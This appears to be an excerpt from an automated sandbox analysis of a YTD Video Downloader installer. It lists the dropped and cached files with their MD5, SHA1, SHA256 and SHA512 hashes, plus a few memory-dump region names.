SHA256 5cfd1ab1740c4a68cae314157468423dcd7b0ffe873b91257e10fa28169a7d18
SHA512 6d0a31a6c5c4b965633f943eaa15d3495be072f035d97deac27690d6a6a6890a8f817b406153fbba5a8862675b4f3015ac9e93fc8b6d90b1c4b029857123a117

\Users\Admin\AppData\Local\Temp\nsyE0FE.tmp\UserInfo.dll

MD5 9eb662f3b5fbda28bffe020e0ab40519
SHA1 0bd28183a9d8dbb98afbcf100fb1f4f6c5fc6c41
SHA256 9aa388c7de8e96885adcb4325af871b470ac50edb60d4b0d876ad43f5332ffd1
SHA512 6c36f7b45efe792c21d8a87d03e63a4b641169fad6d014db1e7d15badd0e283144d746d888232d6123b551612173b2bb42bf05f16e3129b625f5ddba4134b5b8

\Users\Admin\AppData\Local\Temp\nsyE0FE.tmp\nsisdl.dll

MD5 ba2cc9634ebed71cea697a31144af802
SHA1 8221c522b24f4808f66a476381db3e6455eab5c3
SHA256 9a3c2fe5490c34f73f1a05899ef60cfef05e0c9599cd704e524ef7a46ead67ba
SHA512 dcc74bcedd9402f7ac7e2d1872fe0e2876ae93cf8bbd869d5b9b7b56cea244ba8d2891fa2b51382092b86480337936f5ec495d9005d47fbfd9e2b71cb7f6ba8f

\Users\Admin\AppData\Local\Temp\nsyE0FE.tmp\nsDialogs.dll

MD5 466179e1c8ee8a1ff5e4427dbb6c4a01
SHA1 eb607467009074278e4bd50c7eab400e95ae48f7
SHA256 1e40211af65923c2f4fd02ce021458a7745d28e2f383835e3015e96575632172
SHA512 7508a29c722d45297bfb090c8eb49bd1560ef7d4b35413f16a8aed62d3b1030a93d001a09de98c2b9fea9acf062dc99a7278786f4ece222e7436b261d14ca817

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Uninstall.exe

MD5 2b4ec88beeaeebdfe0f996fbd53177ec
SHA1 8b60a69d5a72d456c496e4fb061182c5d46a9253
SHA256 410dea37700039f821acdb66d6be05350f37d143798cf39946ed5b4def709b95
SHA512 bd2c5d7f7e4b2ca7f38ff646fecdf46620557b269cae520a43d78fd040d06dc0ccab3eb068bed4621a4186c992850703b065881730f52fe1c29eba47cbea2529

\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

MD5 b1934b07dd28fe1ba94df3861128402b
SHA1 c5d918e696059437dacffa8c3359ee31e97e6e06
SHA256 2670c0406f42be2455f3a20e3ae8b024a41c46b956df9214cb63ca1efa18b17e
SHA512 e863702d96a1a8371403933d9a0e082498d15a39fcf0bedb981913981f8cd9dab64e54202c4a7f2b4c6e4407fd3a7bdb9b0a96340b258476cf59057e80cbbc7f

memory/2072-152-0x0000000000400000-0x0000000000723000-memory.dmp

memory/2416-154-0x0000000000400000-0x0000000000501000-memory.dmp

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll

MD5 ded3aa6b7920334e6b334eaed3db96c5
SHA1 43ddc57d22dce102a3687e548bd36e32fe20495e
SHA256 feed76629d5f9dbe7401a326994e80b003ca5fe1cf876029e4707a71bf4b5860
SHA512 aeec44f69d430a544594433a8e830af075cad27a7dfe83401ee82e51a949d1140e253ee49f786b944ddf98f513f3754eda6bf0311288eddf7ad1a73d8110de9c

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll

MD5 3c07164ceba1068ee3eff672d8e11eb6
SHA1 c96d644ad20a788100609061c052220828784a09
SHA256 170a18f9d841606432b9157f243c43c7a2d53bf1fc028a147bd15f505749e69a
SHA512 af48e1d10f442789df7edaa89b7364f7670134af7f8c624b22073eadaf3516cf10aab196b411835afb839c0256314eb3d75fec37afe3f78f5e5fe123b3ffef4f

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds

MD5 d8ced7c2193354757988028fbdbf197e
SHA1 23e7c13471207cc7abd0267f11f9c814bece7011
SHA256 6b384b1e208a2260f54e3d003449c53c03acd8947c8762060fd9e9832dc3bd9c
SHA512 96db2348c6c8f00fb14321b3b816a1a59a60bc54f66002253d6ac43768c94aca5ec3435069e17a23426034bd583c350cdfbcb9daf4b258a8fd485bc96a34f908

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1033.ini

MD5 5e4f61279b53016801d453b1d7a20cd3
SHA1 f32a34a88f7684264bfe4b1589cb7fd346add1b7
SHA256 546f50186b607153c9f121c751ac592b8905c29397bdd7a9c0bd860e467e6ee9
SHA512 1f9514359eada9224ed52815f02b17712d357e9806171acd1b0c88d6dceadac5692e5a131df4af62b8d15fce01759ffdcc3f075c374a33d43e10df8acc5268c6

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll

MD5 ab0a22194181d6d6ff01123dc9a376ce
SHA1 006355a4240c874443db242ec4d79b8f61e149be
SHA256 4d03b0edd616098fa390a41f8d68f6b77f4c96abf0bbf1578e310c1846017da1
SHA512 1db197bf8e99cd3e729a481a6f24fe1b090a12679a6ab5b6334e26a8442bd80d25379104c475fc9a70111b8c57ca048c4a3f40eb6e667814cce9ab1c86b6253e

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll

MD5 91074f5c7288c67eaed2c2c657e373d3
SHA1 84aecb92336c668bd834a749081eaf1e476c38e4
SHA256 085dc559b88b1687b2918b8ee797734adfbbaa233ba7d8f0e8b5abea8740ca51
SHA512 579a27e5f3565efe46a47034f2880782c5a947b56e65118e8cbc58c886ec805ce39593becce5df4aeb851adc12fc22fd3db450c67b864a618dea05822c58a4a4

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll

MD5 43f19a5d4d42e3cd6514348ba5fbdd96
SHA1 1f708f75fb1024be8b3f6e51ac465664f9414e29
SHA256 634e0e8bcecde4375f1f9510980bc2bf95495acfc8d0a14d15307c49829b4b2a
SHA512 bee50cdaeb50c888bd7df7ed789983a47ce6a50ab8bbba006519640530de8744f164628e741be8cd106cc229de1ca5f63ce23f41e94343869e8ba1aadd840f41

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll

MD5 a3297b187aba1024501007bce77eeec4
SHA1 66b0d789f0fc6e465827bc372047ae1b57fb209c
SHA256 bf000179818fd3db857f7f46dca974698258fc11acf518fd77df4f5a9de05bbd
SHA512 8528aedc44bfb827fa2b5c9fe7c36152daa2e7c4cec32b8eabd8167dca4deadbe3dbd2b4723f00355a1f77cca1ff8c3275cc33c85454ef3e951a72bd1a6a407f

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll

MD5 04a21f5ee0a9c27ca5e5dae050f3d275
SHA1 44835c934ec2a4e37a75023317798837e412e34f
SHA256 ef0fdefcf8af37c1ebaca95e79279907a389915d09e81da38fea9ff17afb1acc
SHA512 6fb0b523288c70f11cd1fae8bed774266956033352df6e9dea3f3881a9b971f0d13eddf9d6d124edccc4dc7ead9441749b091017b3f9ed2b33f887a1f8f660fa

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll

MD5 d4f826e68b616cccc1de1e5ef07738b8
SHA1 e35d6657f4de4826d790c935f94ce41320d09b00
SHA256 1b64f39162f9918597019a89068edb9607caae194fd80b5367df08ed06ed5a78
SHA512 877df9980a3951d9f65983ddfac5df8026229e99618cd05b6c803e754074d760c5f4308cd54a1c7e7ba8f65ef684ea43eaa06ebebd4e1a38441ea9a63b47c956

\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll

MD5 46672363f47a25d69a5324045f4e8d63
SHA1 f0d65ad9301f953f7b604087d27ce3e600891250
SHA256 0a2f80092b426f11dbf54b10542d3d7b45d2e40fc575e8e0e73cdcca47b4885d
SHA512 24b52206390b04cb909a1da12b46294f2aa848a42c27a6d765e6666ffbf86f64bac929e9210723d5c537a11d015d2f556e39821d01310a328cf41c988a25146b

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll

MD5 4088b4e4ea76db97544c76ef7f2af08c
SHA1 c862b32ed75b8ad1c029edd2c0f492fcb689f8e6
SHA256 2d7aff56a160ac39f7b68b34eb1e25bbeee8fca6034fee8f278abd0fb3dbc0d8
SHA512 66f664a8fc270bc611cc1c247fbe9a2b26baa900b7b38a35ac2d232b6af694914667eb066139e1a889b33e226b845f74f615b48ef84eb626fcf3db137468087c

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll

MD5 416108272cc56d4036d5796fbb1b8f3c
SHA1 66a7bb238eb0d4ba6543a0046df5324a8833cceb
SHA256 7bf969f40afb0ae30da950059a10868e1a20c0d64ed7da11fa5c9c7e0a123bc4
SHA512 682062f8d3b012242b3f679a16f1e4edf62f7918864488f49fcc8ee5b938989ec6828417c0f771ec2835e11688ce024dc84dbc859c70daac2fff87fab28019fa

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll

MD5 350983ab596397b2d2703d658baeea8c
SHA1 63205b4238ba14871bc44c7b14b61c43ea509f19
SHA256 36f5f233c3c01c8ddbe330a760d28c0733fc512ba5097daba5c992742e0a6571
SHA512 b923e096a0f0460055d8f959ea496625e87a939b0c054fb2331508d8905a3c19ef7dd9a0d327144a70a1ded62cfb602c42637fa2be1de69b1a74f61101fb962e

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll

MD5 6d9fa70a05698e9b6aa1c6074def16e8
SHA1 41b2e9aa0ed69a75a279cd3b57e5b4666e9ab991
SHA256 3ef1918ccb05373eb15f5298d083c1c0a8e171ed2ab321a6c2270f26c2185a5b
SHA512 a075bdba7c71664880549b6779d56fc5e354f1ed11eb1f50be68e4e6f81c7fc4b4ead6a7478e58c460f292aac02506d01d5c65a7b42cd4a65ef554b75a20eb01

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll

MD5 3dee8d41db28133b3d00bfdf0fd16eaf
SHA1 55f447676e8d94df25285155f6974583613395ed
SHA256 d6af06ae76f1409b16d2e781217b863a7b32d5ca953795f52d5aa54b0491272c
SHA512 6b222b39601210957082e490073b2d15caa0ccb94121385f4372a02f916a04d4c1824b0f897c875fa1a756d81d511f4ffa649dae7cc900c3746817e1049a67ac

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll

MD5 ccc67f588880568bfd46c4b8140f41aa
SHA1 5d37e43434dc31d55624bfd481c816bd2a285b6d
SHA256 8f42dafb5528c09248478913ba39b6381128c28eace727b488d639f36e614a7d
SHA512 5ac2ae619bb27a4c8cd2fdbed454d930cb5ed8ffa134ab6e9eb84c156650955b7eb1ab4542e5477f7aebad95194dd0dd751dfc508781d9820079d8189ef45092

C:\Users\Admin\AppData\Local\Temp\Cab1DFE.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar1E30.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 70bd75a678d49ac339baf9b941715ca8
SHA1 bca1b72a1f10d49686664d54f264ffa89b59a785
SHA256 1eaeee7262520db84facca35f46579834158700eede61a3296524095ecbc8457
SHA512 60efdd707a46e26c758fbb793999338258402239724d3824cb26b959414a645e261bb0473e01c1b75d60eb40a196600d645a97053767401e14a3648cfca0a4c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

MD5 174359536ce636e77097214500667510
SHA1 ba70cf9c7ba362e5c641febf3cd9fd0f02ce2c63
SHA256 17399790dac618abf69eae330e18196379c8629ac5861d7b6f15bde3e6592081
SHA512 38308d863204fa49ec8cb4b17c5394c68a85fe8c526a0bae793f1bab08d24ce264c9ea78da1925e2d70397ef5561bb1a5cdc47c8658d82152fdb499b347a2e8b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

MD5 088ec200c6b990ff2e47021f40fc6407
SHA1 8ac6b8c18158d5cf74db6382b989bc5c7117064d
SHA256 34f2a79579c52ad2cb7c29098851a486c451b0a9583145a18083ac9a3c60e14e
SHA512 858995a946f6c9f120d0dbb671f4f4dac16a5a116246a0202df13e9519fb4ffb7dc28c907a7e37b768e8fba866538416c21d316aaf608851f26a8dafdc89aa89

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

MD5 e299c2df44abc6a1f1573e7909b2d560
SHA1 1f53c9b70dd7cd7ef48b391d80808728d0f583b9
SHA256 e26134ea32535a0be3f17381bfd31ea5869136060a5a109a56b4da171723f70c
SHA512 072442798df8b45dc0e6b060b02e8aab90e1ccd09874b40087a5b12697afae53d2b329c0c46c24a6fe00f1c587974764c91dddf2cb94bf002fdba5b3f153c843

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

MD5 79b64cad1f14065bb9f8256038fe56f1
SHA1 ffa42c768c8cc6b6e5aa9b3ed75049a5926d2902
SHA256 3d1aa903d9e37d10b344207b85d05b0ce4a49e0cb97d6a809c6aa1cb2af50f0f
SHA512 b24de79a036be8c8a413620d27dac559e8dbc7cd25df6bd6eae6b27cf165a93dc6425830863f8d9059d66cc7c90f8cc8abb4c75f15bd47518654d0d3e92e3560

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80d08b8b97355ee9f1698ff439650e5a
SHA1 71f2d482f76254c35f36e11a5361e26fc5f9fefb
SHA256 ca9d5a313b781f7b95c20a514d6f5ab288a76a9c55d5fbb8f4ae8cd3ae43fd94
SHA512 5d9f1620aa7794c645af57626e9efd850a2b70a0b93ad58d46bc7fbb9870d64f6044ecf8a8d46ef8ea181cdc77fc40fe64e9d9b6b65cc0dbd41530445d1cb30e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 65abfa06bec4f6189f410f3875fd4716
SHA1 657b0a5de821a41d6275e1ae633e10507ca4c264
SHA256 0b4da9e271116ffd7cf18df15a937f9f25b40617c2f7ef1dbc5fe8a4493fa9ff
SHA512 385f1a46ca806599e8236dbb5e1bace568ad609c92fbb0adf4d8c1ca05ce2f74d38f5035ce3b252783d87151ce1034bf8147a14a9fa46d0cbf3e5d586d2b5bd3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5517b3beb2088c231cb670a0b8cce841
SHA1 80b007fca03d1e6cea58c409f43cf2786492d41e
SHA256 af269c771b3f6c66bed563bdacce4b5d158d814e3a841a5dc61eceb8ba7c906d
SHA512 0ae052eade90403b8c5ae268f5eb43b599fdebf23aa4d9939e6b0c02548e472fa8a4e329b8e20bb266af00890a2b12966d0af9b46088192555697bb64e37298e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9a4e94e84d2de96ad02f5babd97edb43
SHA1 d1e8883ef35a9ccbdd330d69579ce310569d3dca
SHA256 2332dc28c1863b5354d688961c7b205f085a47815b690affb6d337260fc0c8de
SHA512 d2bd9ee0a1ebb707b610c17eba033be4a2434b21d93be1f2f08b367aba4566f73fe9d6d4dd6e30f72ccf5811b488405ac0ba34320e87b94fea62168a70981614

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 effdb9892bf5d5d551ca0266d8ff2934
SHA1 eeb3c21e3a66a9c9a7beba2b4ad41c7e905ac82e
SHA256 161cf8d4249c801e90d15a99000332c02904455fe3dc37404f47bb04fda7d625
SHA512 f261bc903e53279e34a93aa1ef70a0391fffed2e54a080a6f677035800775137b3d14b93ecdb4d5df431c2f9e1f3d4d185585a06ac346abc32679f3af63f1546

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9d546151dd2b186778546400971bb5bd
SHA1 71e949fc47cddf1e48e9e61c7cc9e7d21da3daef
SHA256 b7bdc7bbd739a86d03930b0b804e6c19488beb76ebc2eb709845f53cf6bd8647
SHA512 7c82f126a6c617687048b9ddb7b87278b78f2fc5bdc2ec29e4daf2a793a52abe66da01ff36af2a51e33a078c2b6c5574e7d47e616907fdbc71b15f00a7ee1a9c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1049f690a1350f6e900a1a5dfe191e1c
SHA1 f819cc2d36e042b48464df53b5bcfa98b75ef479
SHA256 377daa1bcf14003fc59a1ace01698034e98ba67b88909c269acb07fee7227dcc
SHA512 157329dc55a0889377e86876977c71e071170c1660d1f0d4009d28166043ad84ba9f16399625c6b4711f34d84ee80de3469539f9a777d04d40c6093a2e702102

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4d35a992fe874f9e19722f99fb9cc242
SHA1 eeac0d259628945168234158bd86386a6aef7b5a
SHA256 e9d530f1c5bf0fdd44292608f95f46c510bc3076ab680ac31adf78c0ec211887
SHA512 0e34325b7fd61f33e051f7fcd5c2eed0a1c4025a46f808ab84164f4253855d871ed78826a17337d99e0c4d0b19c88bca11e16c0ba970eade02aa52732c866287

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 66d1f41f709f824c785461c83bb001d5
SHA1 9cea7f8a328fe11c44390cf3ed3b4d7bd4c96078
SHA256 173b87f1e31596e8af12e976909089686425bba0a7a67bd13d02e3a3a81277ac
SHA512 797fe6300dc84102636b10524238523fc55dc5e31c0c681c422961f521e96616566dd8a78a0c84ce264e861ffcb86a6494ad560bfd3d430bdfb4ddb94a1f3f43

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ca2ed9fbe7833c8032d325cee66a1685
SHA1 d125ba70dcaef9d1b5ecd293591f796e0cc6e2de
SHA256 e9242f5c559debf079826cf54177ff4d1488c7b33f071aec6876f01b5fe11faa
SHA512 6bdc6433925d0d9348046ccfb4ffea14c55ddd3d8b512664559e27de908bc66420176a46d10f8019cf1268528962e53809620fe02d8372bc719a8fe8ace57dc1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a19f24b91a8bd4db8ecf4df1139aa1fc
SHA1 38a7276754bd5d1e8ca586a03367787d5cbd052f
SHA256 aaa4bd1aadb367ea1c25dec5824132494dfff5a06198d64a2db24db8ff7a4305
SHA512 ab5259e6e0e6f8258cb53f769c599ba9c77da4d02bfd2e272068299f392d6f91c8157646102ff8d0d1a8d5e37926e799a958e2c5fa45e7ebfefc3d22cfad6bb8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c4b0809084d147e1a15cf1d27c2970ff
SHA1 cc58bd334b31ead08b4bd439437b15725e021684
SHA256 6ceda3cf5d11364eb64af3a80867202563e0733fec0560d0e02a35ebf78ae911
SHA512 61b951405b21f4e904829c8fdd2008490c98ac571563be5bc009af22b44d2a730aa9b97d31ba45162b6fd35f5036cdb7f4fbe40138d81fd9d22fe9c6f9b86a01

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\favicon[1].ico

MD5 b71d2d64c174e580bbf5fab2bdd8f5bc
SHA1 032fc9ffbdd4b8e2cf0490f0b78e3f41eb979084
SHA256 609e7c323da93b1f5f56ea594792c4bdbe55bc5efec0c074cc0f71b706452bd9
SHA512 8722a98063d56891cc00093d4d3d5084f5c9a6b300d3f0a133d881de7a01d896efa3e002cd54f1c4d02d443c013f3e6638e19eadeae24f933a47b835cec3b344

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 038147d4cdfd4b8d8af3d6c69a59f54f
SHA1 d1a4fbbe468e12483c493e7f31222316b22404a9
SHA256 514ec6d559a4024986d48bec05965ed23efeb7f39b5d67ba56dc0c98562e1cb5
SHA512 0fa7b6a84410b7b3aebd46c8fe031ef3c0eeae2a0cbfc63818949468432f212a87638ca8c258d4ad50d157bdfea529e0e219ea29964884a3c1cf9c639207ab48

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dc7785fedacb72a0c9889b9845385bdb
SHA1 e96c18c942e2ea7a06894397aca1282cb3f9ec07
SHA256 0e28fc941080ec7e4bfda75df253d3cf3efa04e88ff2e4831a6d2d3cfc76c326
SHA512 fd802b925a0d0c9cacd8883542d22c6ae1971f7920a18a155a947b0eb6d0e65226aaf84dcead9e2035cf09562a6e179da7d8cb3d0319d6c0e233e29232c03f91

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b5ff24c661882ba0f676dfc4ee3fdf7f
SHA1 6ee87578cfc7adb0484487dc0205dd16e0cc32d8
SHA256 75438b56c44e81e9c32b2addafae41f25e00c1abba84b9e7ec50caac7903fa52
SHA512 578b7d74c5af8cfd7fa9ab98b45964b7c553a77b33a6be3414141c86228595a24c01856a4bd02ecb9f12e8b1ccf9a6d03ffc2f3aab026027418cadf5c1c3bb20

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 672a73c44f607dd3987ee52dbe8ebc36
SHA1 3d971538e577c5710e053db69c6cecd549b7e158
SHA256 71c7b9553823ce2e72966e424631e1a8670a4137a55e726644717dc3ac8fa058
SHA512 aba147c7c7e6ea51412851b7cf8468d876b08ebeb8cc5a6b64431c54233744021bd415248ee5f5134f1a64a233743520306a18825ce9fc03bf2a312dd5002208

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 59edc3899da91263a060cd254a1e257a
SHA1 c8cd4e312e6dbdd75e8f0b8c1f48f9d5ac3d619c
SHA256 c903c1a6dabc60d908bba5c20b1d81fe27431c8c01cdccec3632965e64f53b7c
SHA512 30c8094ec325d9e848bd4d81fbf467b17604bb287f447f6c1d18a006cb7f3e0d7bb1f30fbd59f4b0eef308d39ff87511b2da6a8ff417eea87d957c74e53bf39f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e26c646b209cf60be4a7a24a28cb4254
SHA1 6ecdc92ddb4e3e708deaa51b28f8d891f612bb1c
SHA256 6a5664d648086cf591856c1811d8144f604e56ef97bdf24c75b5ed035e9aec88
SHA512 d77f149353cac4b28263fa02ee5b97a45c702777bcd89d14382a01254f3b541a1eb0b82fd59b7b50caad2abdddcec57af2cc8c7a9ffc6a580ce93498a42df3a4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 702d280524639191b5886a8c17af647c
SHA1 9fbd69dc29a7b2d2f9e897a5d33db08c585db356
SHA256 14fac4de843aff5251788ae7663e09e49b7b8c72e978fe26c31eb378b05d4f8b
SHA512 dcbe3173a6a29663fac00ae45cfbb76dd353b80686b7d5502d420b17ce7172a8c7723113ecc0bb4cf77d7efb8b531376440fe69a722ab8898eef9722fc9c2684

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5dfab9f39983301be906486249374452
SHA1 1a8dbd165d8a9bc448b55d0b937087f5b60cda17
SHA256 ce58b28d7d93d6af5b1ad6efdf149f71578bada04c4e81402f3c40e74f9fb288
SHA512 118827ae41e45b2c75a7c75d0b6a7dbdd85a583e0c809fd31aa64c63a7f44ff1b830d3fd148f2b6193db074ce915231720e81fabe86f8d84916c6a9918c551b6

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\recaptcha__en[1].js

MD5 33aff52b82a1df246136e75500d93220
SHA1 4675754451af81f996eab925923c31ef5115a9f4
SHA256 b5e8ec5d4dcc080657deb2d004f65d974bf4ec9e9aa5d621e10749182fff8731
SHA512 2e1baae95052737bdb3613a6165589643516a1f4811d19c2f037d426265aa5adf3c70334c1106b1b0eef779244389f0d7c8c52b4cd55fce9bab2e4fcb0642720

memory/1904-1679-0x0000000074EA0000-0x0000000074EC4000-memory.dmp

memory/1904-1680-0x0000000071CA0000-0x0000000071EE5000-memory.dmp

memory/1904-1682-0x0000000074820000-0x0000000074834000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\spacer[1].htm

MD5 4aa7a432bb447f094408f1bd6229c605
SHA1 1965c4952cc8c082a6307ed67061a57aab6632fa
SHA256 34ccdc351dc93dbf30a8630521968421091e3ed19c31a16e32c2eabb55c6a73a
SHA512 497ba6d8ec6bf2267fe6133a432f0e9ab12b982c06bb23e3de6e5a94d036509d2556ba822e3989d8cd7e240d9bae8096fc5be8a948e3e29fe29cab1fea1fe31c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\ga[2].js

MD5 e9372f0ebbcf71f851e3d321ef2a8e5a
SHA1 2c7d19d1af7d97085c977d1b69dcb8b84483d87c
SHA256 1259ea99bd76596239bfd3102c679eb0a5052578dc526b0452f4d42f8bcdd45f
SHA512 c3a1c74ac968fc2fa366d9c25442162773db9af1289adfb165fc71e7750a7e62bd22f424f241730f3c2427afff8a540c214b3b97219a360a231d4875e6ddee6f

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\TVC4TVTK\www.google[1].xml

MD5 c54e105b286e6c004880eb2d05915472
SHA1 5975339866bc939b5002490a2a4555a95de56b8b
SHA256 5e2c575fcdc9fabf06695e416471c60003a37c7e11ed9acc3aa6f8aa59d19aa1
SHA512 14fb657a9b350e6648f2ad2a3bdf314332a06911c21350a6b66fe73c085f0e3c07edb452b1378e39c6a88b16f355c334a5dc6dba2bc5f8a111820c18e718681b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\styles__ltr[1].css

MD5 0ca290f7801b0434cfe66a0f300a324c
SHA1 0891b431e5f2671a211ddd8f03acf1d07792f076
SHA256 0c613dc5f9e10dff735c7a102433381c97b89c4a26ce26c78d9ffad1adddc528
SHA512 af70c75f30b08d731042c45091681b55e398ea6e6d96189bc9935ce25584a57240c678ff44c0c0428f93bf1f6a504e0558bc63f233d66d1b9a5b477ba1ef1533

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\TVC4TVTK\www.google[1].xml

MD5 7a8719fb43f3eca706375b4d35ad5393
SHA1 a51d4ce8a7889c32f91f5aa227a37e1b003e30b3
SHA256 6f0c607ba2f61466849afa1816b278b3cf7223e71abb564811c5da9ae923ebd4
SHA512 bc8f036a0d1938bd9ae05c5c64ac76c075b5a91544776578670a1f4d0d4502c7d63b62254a7880d480be9e34980ceaf9f914894c93be68eb272c28e0e0027eb4

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D6V88JEY\nqindL10x-xAPrwNrAa_2xXCVxcRZYSWuE-W4fSi8Ko[1].js

MD5 d99939496f22d283c093dc7989278200
SHA1 5f637e9351b678dee8473c56b464c8184dce59b4
SHA256 9ea8a774bd74c7ec403ebc0dac06bfdb15c2571711658496b84f96e1f4a2f0aa
SHA512 5bbcb7d40ab59d5f12d16a523c3f713f82d702dd61b4cbd485f80052317943857a03ee8071618a42d498733ae7c59ce9f5044540acbde7d5fdd2e12af0a4cfd6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 04e542987b61a2093b2bf7ec220f8dfc
SHA1 67caf9f64679ad3e05be605b77b2a1eca0bde9d5
SHA256 89fe7f99d2a98acf86344ba6663e6c237c4969fda210be89733b594d4798f951
SHA512 3452d4decb6a9b175a31fe27db895170e72fe2ed943220c9c6a2ca814fe357c522969646df0d27ccfe29d0d3673747e9ea178ff6f0e130f64ccd2c6cab2f088e

